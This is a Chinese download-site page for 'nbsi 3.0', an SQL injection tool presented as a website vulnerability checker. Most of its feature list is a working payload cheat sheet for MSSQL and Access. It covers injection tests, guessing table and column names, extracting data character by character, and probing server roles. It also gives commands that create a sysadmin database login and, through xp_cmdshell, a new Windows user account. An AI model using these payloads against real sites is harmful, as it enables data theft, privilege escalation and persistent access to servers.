发布应用 您好,如有软件收录需求,请将软件打包,并附上软件名称、软件介绍、软件相关截图、软件iocn、软著、营业执照(个人没有营业执照请提供对应的开发者身份证正反面以及手持身份证本人照片),发送至邮箱
business@bear20.com
用户反馈
nbsi

nbsi

正式版官方版
(3.0)

人工检测,安心下载

软件投诉

  • 大小

    4.07

    MB

  • 下载

    102

  • 语言

    简体中文

    CN

  • 系统

    >=7

    winall

  • 类别

    其他

    finder

  • 更新日期

    2019-10-04

软件介绍/功能

      nbsi最新版是款功能实用且容易上手的网站安全漏洞检测工具,nbsi最新版基于开源sql注入分析器由VB语言编写ASP注入漏洞检测帮助用户快速检测网站中存在的漏洞并提示修复,强劲切检测结果精准,速度快是网站用户检查网站漏洞修复的必备工具。

功能介绍

      1.判断是否有注入

      ;and 1=1

      ;and 1=2

      2.初步判断是否是mssql

      ;and user>0

      3.判断数据库系统

      ;and (select count(*) from sysobjects)>0 mssql

      ;and (select count(*) from msysobjects)>0 access

      4.注入参数是字符

      'and [查询条件] and ''='

      5.搜索时没过滤参数的

      'and [查询条件] and '%25'='

      6.猜数据库

      ;and (Select Count(*) from [数据库名])>0

      7.猜字段

      ;and (Select Count(字段名) from 数据库名)>0

      8.猜字段中记录长度

      ;and (select top 1 len(字段名) from 数据库名)>0

      9.(1)猜字段的ascii值(access)

      ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

      (2)猜字段的ascii值(mssql)

      ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

      10.测试权限结构(mssql)

      ;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--

      ;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--

      ;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--

      ;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--

      ;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--

      ;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--

      ;and 1=(SELECT IS_MEMBER('db_owner'));--

      11.添加mssql和系统的帐户

      ;exec master.dbo.sp_addlogin username;--

      ;exec master.dbo.sp_password null,

      username,password;--

      ;exec master.dbo.sp_addsrvrolemember sysadmin

      username;--

      ;exec master.dbo.xp_cmdshell 'net user username

      password /workstations:* /times:all

      /passwordchg:yes /passwordreq:yes /active:yes /add'

更新日志

      修复http发包API错误问题

      优化字典,删了10万无用字典

      显示状态可是设置提示那些状态码或者不提示那些状态码

历史版本

版本 属性 语言 系统版本 更新时间 操作
  • nbsi3.0 正式版 简体中文 win7或更高版本 2019-09-29
Document
发布应用 您好,如有软件收录需求,请将软件打包,并附上软件名称、软件介绍、软件相关截图、软件iocn、软著、营业执照(个人没有营业执照请提供对应的开发者身份证正反面以及手持身份证本人照片),发送至邮箱
business@bear20.com
用户反馈

Page Not Found

未找到相关页面,请检查网址是否正确。

回到首页

290

nbsi
精选评论
第三方账号登录
  • 微信账号登录
  • QQ账号登录
  • 微博认证登录
夸克浏览器 关闭 剩余5 广告
重播 ×